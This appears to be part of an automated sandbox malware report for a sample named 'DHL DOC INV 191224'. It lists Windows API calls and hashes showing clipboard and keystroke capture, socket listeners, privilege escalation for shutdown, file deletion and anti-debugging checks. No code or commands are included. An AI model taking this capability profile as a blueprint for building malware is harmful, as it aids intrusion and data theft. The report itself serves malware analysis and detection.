• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00390C00
• GetLengthSid.ADVAPI32(?), ref: 00390C17
• GetAce.ADVAPI32(?,00000000,?), ref: 00390C51
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00390C6D
• GetLengthSid.ADVAPI32(?), ref: 00390C84
• GetProcessHeap.KERNEL32(00000008,00000008), ref: 00390C8C
• HeapAlloc.KERNEL32(00000000), ref: 00390C93
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 00390CB4
• CopySid.ADVAPI32(00000000), ref: 00390CBB
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00390CEA
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00390D0C
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00390D1E
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00390D45
• HeapFree.KERNEL32(00000000), ref: 00390D4C
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00390D55
• HeapFree.KERNEL32(00000000), ref: 00390D5C
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00390D65
• HeapFree.KERNEL32(00000000), ref: 00390D6C
• GetProcessHeap.KERNEL32(00000000,?), ref: 00390D78
• HeapFree.KERNEL32(00000000), ref: 00390D7F
  • Part of subcall function 00391193: GetProcessHeap.KERNEL32(00000008,00390BB1,?,00000000,?,00390BB1,?), ref: 003911A1
  • Part of subcall function 00391193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00390BB1,?), ref: 003911A8
  • Part of subcall function 00391193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00390BB1,?), ref: 003911B7
Similarity
• API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
• String ID:
• API String ID: 4175595110-0
• Opcode ID: fe98da2956d33a20392d21ccc3817494a777b1dbb92b7143a1a32824ef19fd52
• Instruction ID: 9124ea8c7de129564b17392fe9250bcfef17763c0f886c2ed4d6ad8d3d73d61a
• Opcode Fuzzy Hash: fe98da2956d33a20392d21ccc3817494a777b1dbb92b7143a1a32824ef19fd52
• Instruction Fuzzy Hash: 2771587290021AAFDF16DFA5DC48FAEBBBCBF04304F054615E919E6291D771EA05CBA0
APIs
• OpenClipboard.USER32(003CCC08), ref: 003AEB29
• IsClipboardFormatAvailable.USER32(0000000D), ref: 003AEB37
• GetClipboardData.USER32(0000000D), ref: 003AEB43
• CloseClipboard.USER32 ref: 003AEB4F
• GlobalLock.KERNEL32(00000000), ref: 003AEB87
• CloseClipboard.USER32 ref: 003AEB91
• GlobalUnlock.KERNEL32(00000000), ref: 003AEBBC
• IsClipboardFormatAvailable.USER32(00000001), ref: 003AEBC9
• GetClipboardData.USER32(00000001), ref: 003AEBD1
• GlobalLock.KERNEL32(00000000), ref: 003AEBE2
• GlobalUnlock.KERNEL32(00000000), ref: 003AEC22
• IsClipboardFormatAvailable.USER32(0000000F), ref: 003AEC38
• GetClipboardData.USER32(0000000F), ref: 003AEC44
• GlobalLock.KERNEL32(00000000), ref: 003AEC55
• DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 003AEC77
• DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 003AEC94
• DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 003AECD2
• GlobalUnlock.KERNEL32(00000000), ref: 003AECF3
• CountClipboardFormats.USER32 ref: 003AED14
• CloseClipboard.USER32 ref: 003AED59
Similarity
• API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
• String ID:
• API String ID: 420908878-0
• Opcode ID: 82130fe0ce43d044762da52469f652e50ba1c5662546efe4e3d8bbb1e0387665
• Instruction ID: bab2532d7984057a3522fbec8864975af97964e1b534fa44c0b70d3eb5d37218
• Opcode Fuzzy Hash: 82130fe0ce43d044762da52469f652e50ba1c5662546efe4e3d8bbb1e0387665
• Instruction Fuzzy Hash: 7D61F435208301AFD302EF24D899F2AB7A8EF85714F09555DF45ADB2A1CB31ED06CB62
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 003A69BE
• FindClose.KERNEL32(00000000), ref: 003A6A12
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003A6A4E
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003A6A75
  • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
• FileTimeToSystemTime.KERNEL32(?,?), ref: 003A6AB2
• FileTimeToSystemTime.KERNEL32(?,?), ref: 003A6ADF
Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                        • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                        • API String ID: 3830820486-3289030164
                                                                                                                        • Opcode ID: b896ae42863568b97ec5f52bee3efd70a8a84cdaa7b90c64ca3a9cd5510e8fdb
                                                                                                                        • Instruction ID: 8a57dee008a88b93b18a58b5d539707f4d384203e835906b37b0f6105918e19f
                                                                                                                        • Opcode Fuzzy Hash: b896ae42863568b97ec5f52bee3efd70a8a84cdaa7b90c64ca3a9cd5510e8fdb
                                                                                                                        • Instruction Fuzzy Hash: 91D160B2508300AFC715EBA4C986EABB7ECEF89704F04491DF585DB191EB74DA44CB62
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 003A9663
                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 003A96A1
                                                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 003A96BB
                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 003A96D3
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 003A96DE
                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 003A96FA
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003A974A
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(003F6B7C), ref: 003A9768
                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 003A9772
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 003A977F
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 003A978F
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 1409584000-438819550
                                                                                                                        • Opcode ID: f844ab44184a2a134b4b864076b12cfd988e8aa521e1c09a7fdee7f0efd0fb57
                                                                                                                        • Instruction ID: 7b63f622de64c7e50bc6dc2d29264e7d833c5ece09189830cdfc39f2a16236f9
                                                                                                                        • Opcode Fuzzy Hash: f844ab44184a2a134b4b864076b12cfd988e8aa521e1c09a7fdee7f0efd0fb57
                                                                                                                        • Instruction Fuzzy Hash: 4A31B0325002196ADF16AFB5EC09FEE77ACDF4A321F114596E909E21A0DB35ED448B20
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 003A97BE
                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 003A9819
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 003A9824
                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 003A9840
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003A9890
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(003F6B7C), ref: 003A98AE
                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 003A98B8
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 003A98C5
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 003A98D5
                                                                                                                          • Part of subcall function 0039DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0039DB00
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 2640511053-438819550
                                                                                                                        • Opcode ID: 1b904fd3367184ed3df09d9b16ebeaa27d77da3b71674caaeb9b99636db6ba51
                                                                                                                        • Instruction ID: cccf64afb31ad269354f530ffca349d700e7cf254e0a6db0ad1df614fd45c08a
                                                                                                                        • Opcode Fuzzy Hash: 1b904fd3367184ed3df09d9b16ebeaa27d77da3b71674caaeb9b99636db6ba51
                                                                                                                        • Instruction Fuzzy Hash: 0E31B0325002196ADF12EFA4EC49FEE77ACDF07320F118556E914F21A0DB39EE458B20
                                                                                                                        APIs
                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 003A8257
                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 003A8267
                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003A8273
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003A8310
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003A8324
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003A8356
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 003A838C
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003A8395
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 1464919966-438819550
                                                                                                                        • Opcode ID: cdb30c16dcb16c6f1c65dd6f974b67c548fb5a66077f92434091043b3aecda30
                                                                                                                        • Instruction ID: 7a1f713e16fdd48fdac93cb5a6bcedcfec8d0a3e69484e1e922ee2bec63d56a8
                                                                                                                        • Opcode Fuzzy Hash: cdb30c16dcb16c6f1c65dd6f974b67c548fb5a66077f92434091043b3aecda30
                                                                                                                        • Instruction Fuzzy Hash: 10615A765043459FDB11EF60C880AAEB3E8FF8A310F048D1AF989DB251DB35E945CB92
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00333AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00333A97,?,?,00332E7F,?,?,?,00000000), ref: 00333AC2
                                                                                                                          • Part of subcall function 0039E199: GetFileAttributesW.KERNEL32(?,0039CF95), ref: 0039E19A
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0039D122
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0039D1DD
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 0039D1F0
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 0039D20D
                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0039D237
                                                                                                                          • Part of subcall function 0039D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0039D21C,?,?), ref: 0039D2B2
                                                                                                                        • FindClose.KERNEL32(00000000,?,?,?), ref: 0039D253
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0039D264
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                        • String ID: \*.*
                                                                                                                        • API String ID: 1946585618-1173974218
                                                                                                                        • Opcode ID: 1f77eb1fdef988335781bfa278d74a02553c639826332c2e17ab73743540dc4f
                                                                                                                        • Instruction ID: fb75530b5c2a28def164653b4b8f5fdc007a45c2f66707c4c21e9511a569e8f8
                                                                                                                        • Opcode Fuzzy Hash: 1f77eb1fdef988335781bfa278d74a02553c639826332c2e17ab73743540dc4f
                                                                                                                        • Instruction Fuzzy Hash: 4D615F3180510D9FCF07EBE0DA929EDB779AF55300F248565E4467B191EB31AF09CB60
                                                                                                                        Similarity
                                                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1737998785-0
                                                                                                                        • Opcode ID: c043fda8aeab1f91e8ef3323119c1ccb09acc07bc037599c5d988d7134054a3f
                                                                                                                        • Instruction ID: 2f911999940646a056ec68223d75a779070f3f79345b436ed397cd3acd153cf4
                                                                                                                        • Opcode Fuzzy Hash: c043fda8aeab1f91e8ef3323119c1ccb09acc07bc037599c5d988d7134054a3f
                                                                                                                        • Instruction Fuzzy Hash: 2341AB35204611AFE722CF15D888F19BBE9EF45329F19D099E8199FA62C735FC42CB90
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 003916C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0039170D
                                                                                                                          • Part of subcall function 003916C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0039173A
                                                                                                                          • Part of subcall function 003916C3: GetLastError.KERNEL32 ref: 0039174A
                                                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 0039E932
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                        • String ID: $ $@$SeShutdownPrivilege
                                                                                                                        • API String ID: 2234035333-3163812486
                                                                                                                        • Opcode ID: a449b0de9da0fd621dc3e6f9bd7bdbc382fd4834fa73a4ac8b628799e15eeb6f
                                                                                                                        • Instruction ID: c2e17d0c84c03e6f0a958fae112cc67095678395240af6d6fb6edc9edea87847
                                                                                                                        • Opcode Fuzzy Hash: a449b0de9da0fd621dc3e6f9bd7bdbc382fd4834fa73a4ac8b628799e15eeb6f
                                                                                                                        • Instruction Fuzzy Hash: D601F973A20215AFEF56B6B49C86FBF726CA714751F150821FD13F61D1DBA96C408290
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 003B1276
• WSAGetLastError.WSOCK32 ref: 003B1283
• bind.WSOCK32(00000000,?,00000010), ref: 003B12BA
• WSAGetLastError.WSOCK32 ref: 003B12C5
• closesocket.WSOCK32(00000000), ref: 003B12F4
• listen.WSOCK32(00000000,00000005), ref: 003B1303
• WSAGetLastError.WSOCK32 ref: 003B130D
• closesocket.WSOCK32(00000000), ref: 003B133C
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: ErrorLast$closesocket$bindlistensocket
• String ID:
• API String ID: 540024437-0
APIs
• _free.LIBCMT ref: 0036B9D4
• _free.LIBCMT ref: 0036B9F8
• _free.LIBCMT ref: 0036BB7F
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,003D3700), ref: 0036BB91
• WideCharToMultiByte.KERNEL32(00000000,00000000,0040121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0036BC09
• WideCharToMultiByte.KERNEL32(00000000,00000000,00401270,000000FF,?,0000003F,00000000,?), ref: 0036BC36
• _free.LIBCMT ref: 0036BD4B
Similarity
• API ID: _free$ByteCharMultiWide$InformationTimeZone
• String ID:
• API String ID: 314583886-0
APIs
  • Part of subcall function 00333AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00333A97,?,?,00332E7F,?,?,?,00000000), ref: 00333AC2
  • Part of subcall function 0039E199: GetFileAttributesW.KERNEL32(?,0039CF95), ref: 0039E19A
• FindFirstFileW.KERNEL32(?,?), ref: 0039D420
• DeleteFileW.KERNEL32(?,?,?,?), ref: 0039D470
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0039D481
• FindClose.KERNEL32(00000000), ref: 0039D498
• FindClose.KERNEL32(00000000), ref: 0039D4A1
Strings
Similarity
• API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
• String ID: \*.*
• API String ID: 2649000838-1173974218
APIs
Strings
Similarity
• API ID: __floor_pentium4
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 4168288129-2761157908
APIs
• _wcslen.LIBCMT ref: 003A64DC
• CoInitialize.OLE32(00000000), ref: 003A6639
• CoCreateInstance.OLE32(003CFCF8,00000000,00000001,003CFB68,?), ref: 003A6650
• CoUninitialize.OLE32 ref: 003A68D4
Strings
Similarity
• API ID: CreateInitializeInstanceUninitialize_wcslen
• String ID: .lnk
• API String ID: 886957087-24824748
APIs
• GetForegroundWindow.USER32(?,?,00000000), ref: 003B22E8
  • Part of subcall function 003AE4EC: GetWindowRect.USER32(?,?), ref: 003AE504
• GetDesktopWindow.USER32 ref: 003B2312
• GetWindowRect.USER32(00000000), ref: 003B2319
• mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 003B2355
• GetCursorPos.USER32(?), ref: 003B2381
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 003B23DF
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForeground
• String ID:
• API String ID: 2387181109-0
APIs
  • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
• FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 003A9B78
• FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 003A9C8B
  • Part of subcall function 003A3874: GetInputState.USER32 ref: 003A38CB
  • Part of subcall function 003A3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003A3966
• Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 003A9BA8
• FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 003A9C75
Strings
Similarity
• API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
• String ID: *.*
• API String ID: 1972594611-438819550
APIs
  • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
• DefDlgProcW.USER32(?,?,?,?,?), ref: 00349A4E
• GetSysColor.USER32(0000000F), ref: 00349B23
• SetBkColor.GDI32(?,00000000), ref: 00349B36
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: Color$LongProcWindow
• String ID:
• API String ID: 3131106179-0
• Opcode ID: 30d893dec7e2f41d89bb7b65b2902b39ab7b960546b9ba9dc0c5d76044e7f70b
• Instruction ID: ccc2c9f3ac840612bc20cc63fcfbfd93267e7e63c35db068a32e50363d256a5f
• Opcode Fuzzy Hash: 30d893dec7e2f41d89bb7b65b2902b39ab7b960546b9ba9dc0c5d76044e7f70b
• Instruction Fuzzy Hash: 17A1FA70108554AEE727BA3C8C89F7B2ADEDB82350F26425BF502DEA91CA25FD01D375
APIs
  • Part of subcall function 003B304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 003B307A
  • Part of subcall function 003B304E: _wcslen.LIBCMT ref: 003B309B
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 003B185D
• WSAGetLastError.WSOCK32 ref: 003B1884
• bind.WSOCK32(00000000,?,00000010), ref: 003B18DB
• WSAGetLastError.WSOCK32 ref: 003B18E6
• closesocket.WSOCK32(00000000), ref: 003B1915
Similarity
• API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
• String ID:
• API String ID: 1601658205-0
• Opcode ID: 6f846360ec075c4541c9f1a5530034d9101a4caa6f926ecb50699ad34919a3d6
• Instruction ID: 858fdf1ca7918442159595ea6ac2b36a1e2e5549f4d4394aac32936f18047765
• Opcode Fuzzy Hash: 6f846360ec075c4541c9f1a5530034d9101a4caa6f926ecb50699ad34919a3d6
• Instruction Fuzzy Hash: B551C675A002006FEB12AF24C8D6F6A77E5AB44718F44845CFA059F7D3C771AD418BA1
Strings
Similarity
• API ID:
• String ID: ERCP$VUUU$VUUU$VUUU$VUUU
• API String ID: 0-1546025612
• Opcode ID: 17eac49ce974cf8ad8fa92a7830afccd0b4cc022d234b9d3d630b4d7f949b4c2
• Instruction ID: 32c543e1319d82574ac451ef6b42341d37e8f0ea581a6d3d301411560b42454d
• Opcode Fuzzy Hash: 17eac49ce974cf8ad8fa92a7830afccd0b4cc022d234b9d3d630b4d7f949b4c2
• Instruction Fuzzy Hash: D4A2A174E0061ACBDF36CF58C8917AEB7B1BF44310F2585A9E819AB681DB749D81CF90
APIs
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 003982AA
Strings
Similarity
• API ID: lstrlen
• String ID: ($tb?$|
• API String ID: 1659193697-3876775998
• Opcode ID: 011e11ee03d21625ed6c75a066b0c00e80e9a1093640a698622d1a920157e426
• Instruction ID: 19b434b85b6818954757c90e8d4a3b2e87b616321c5a0961e58d22a92e9f8d09
• Opcode Fuzzy Hash: 011e11ee03d21625ed6c75a066b0c00e80e9a1093640a698622d1a920157e426
• Instruction Fuzzy Hash: 34323679A006059FCB29CF59C481A6AB7F0FF88710B15C46EE59ADB7A1EB70E941CB40
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 003BA6AC
• Process32FirstW.KERNEL32(00000000,?), ref: 003BA6BA
  • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
• Process32NextW.KERNEL32(00000000,?), ref: 003BA79C
• CloseHandle.KERNEL32(00000000), ref: 003BA7AB
  • Part of subcall function 0034CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00373303,?), ref: 0034CE8A
Similarity
• API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
• String ID:
• API String ID: 1991900642-0
• Opcode ID: 47f37fe2779efe3b3546e312b8d14499ada14d4fb9f8520678d8e61eaceae1b6
• Instruction ID: 7048ec05c7541bc8f3ef34f6fd1d815a2bcdab33873b74f8d3527209a8f8e499
• Opcode Fuzzy Hash: 47f37fe2779efe3b3546e312b8d14499ada14d4fb9f8520678d8e61eaceae1b6
• Instruction Fuzzy Hash: 4B514C75508700AFD711EF25C886A6BBBE8FF89754F00891DF589DB261EB70E904CB92
APIs
• GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0039AAAC
• SetKeyboardState.USER32(00000080), ref: 0039AAC8
• PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0039AB36
• SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0039AB88
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
• Opcode ID: 28bb049169103dfebe68eace05a3f8cbf38d26b140437faccb59a5c462e76f88
• Instruction ID: 3a30f7031821ea092ed3f1cc24f454f04d4cd3f1b9816adb6206d0b91777532a
• Opcode Fuzzy Hash: 28bb049169103dfebe68eace05a3f8cbf38d26b140437faccb59a5c462e76f88
• Instruction Fuzzy Hash: 16313930A40A08AFFF37CB69CC05BFA7BAAAB45310F04431AF585961D0D7749981C7E2
APIs
• InternetReadFile.WININET(?,?,00000400,?), ref: 003ACE89
• GetLastError.KERNEL32(?,00000000), ref: 003ACEEA
• SetEvent.KERNEL32(?,?,00000000), ref: 003ACEFE
Similarity
• API ID: ErrorEventFileInternetLastRead
• String ID:
• API String ID: 234945975-0
• Opcode ID: b5ec1bb4e40fc9960099438e87d18a1fc80b891537a45d3c3b34056fca504000
• Instruction ID: 846471081dff75d0e1203f9e704612a671f28718d053a83691fded423dc8a8bd
• Opcode Fuzzy Hash: b5ec1bb4e40fc9960099438e87d18a1fc80b891537a45d3c3b34056fca504000
• Instruction Fuzzy Hash: 5321BDB1510305AFEB22CF65C948FA677FCEB02355F10582EE646D2551EB70EE08CB90
APIs
• IsDebuggerPresent.KERNEL32 ref: 0036271A
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00362724
• UnhandledExceptionFilter.KERNEL32(?), ref: 00362731
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 94862e27eb190f6264ae365915462a1616b0b624d9041701aeeb16129acfa56d
• Instruction ID: 2ca9a34d2f398b57737d398b075726577ebed4bb580a4a943537b43efcaf787a
• Opcode Fuzzy Hash: 94862e27eb190f6264ae365915462a1616b0b624d9041701aeeb16129acfa56d
• Instruction Fuzzy Hash: 5831D67491121C9BCB22DF64DC88BDDB7B8AF08310F5081EAE80CA7261E7349F858F54
APIs
• SetErrorMode.KERNEL32(00000001), ref: 003A51DA
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 003A5238
• SetErrorMode.KERNEL32(00000000), ref: 003A52A1
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID:
• API String ID: 1682464887-0
• Opcode ID: b26487d99dd36895851bc88b150e1fcc3991f02425174918f05972149d0b4fff
• Instruction ID: 75f928f6152a403f2a0f7bc0adb3b284f1713daeb9fd204a3edb79d4b338f7c0
• Opcode Fuzzy Hash: b26487d99dd36895851bc88b150e1fcc3991f02425174918f05972149d0b4fff
• Instruction Fuzzy Hash: 82315A75A10508DFDB01DF54D884EADBBB4FF49314F088499E809AB362CB31E846CB90
APIs
  • Part of subcall function 0034FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00350668
  • Part of subcall function 0034FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00350685
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0039170D
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0039173A
• GetLastError.KERNEL32 ref: 0039174A
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
• String ID:
• API String ID: 577356006-0
• Opcode ID: 41cebfae6608598bfba9d0ba5752a5daa6102c6e16a95c97d255584d7dc9fe75
• Instruction ID: 0deebe9c8d881015b913e5af9d5a556d6a2b5e1de37ef15fb0c3845e0d429959
• Opcode Fuzzy Hash: 41cebfae6608598bfba9d0ba5752a5daa6102c6e16a95c97d255584d7dc9fe75
• Instruction Fuzzy Hash: FD11BFB2810205AFE7199F54EC86D6AB7FDEF04714B24852EE05696241EB70FC418B20
APIs
• CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0039D608
• DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0039D645
• CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0039D650
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: CloseControlCreateDeviceFileHandle
• String ID:
• API String ID: 33631002-0
• Opcode ID: 984e11ebae04e20158526c3b3d46f0d6daddc902f3e85a6b54d4def1a4d62e1c
• Instruction ID: 79cfc0ec1a97c7d93ffd90e208e935751d77f3705b3b2d058903051104dd0bd1
• Opcode Fuzzy Hash: 984e11ebae04e20158526c3b3d46f0d6daddc902f3e85a6b54d4def1a4d62e1c
